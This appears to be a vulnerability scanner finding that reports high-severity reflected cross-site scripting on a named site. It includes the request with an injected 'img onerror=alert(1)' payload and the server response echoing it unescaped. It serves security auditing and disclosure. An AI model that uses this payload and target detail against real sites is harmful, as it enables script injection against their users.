1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.twelvehorses |
Path: | /S1/RX1ANT/2LVIU6XP/M/ |
GET /S1/RX1ANT/2LVIU6XP/Mfd83d<img%20src%3da Host: www.twelvehorses.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 403 Unknown request Mfd83d<img src=a onerror=alert(1) Date: Sun, 21 Nov 2010 21:34:56 GMT Server: Apache Set-Cookie: JSESSIONID=KHX5LSIUX Content-Length: 150 Connection: close Content-Type: text/html <HEAD><TITLE>403 Forbidden</TITLE></HEAD> <H1>403 Forbidden</H1><BODY> Unknown request Mfd83d<img src=a onerror=alert(1) <P> </BODY> |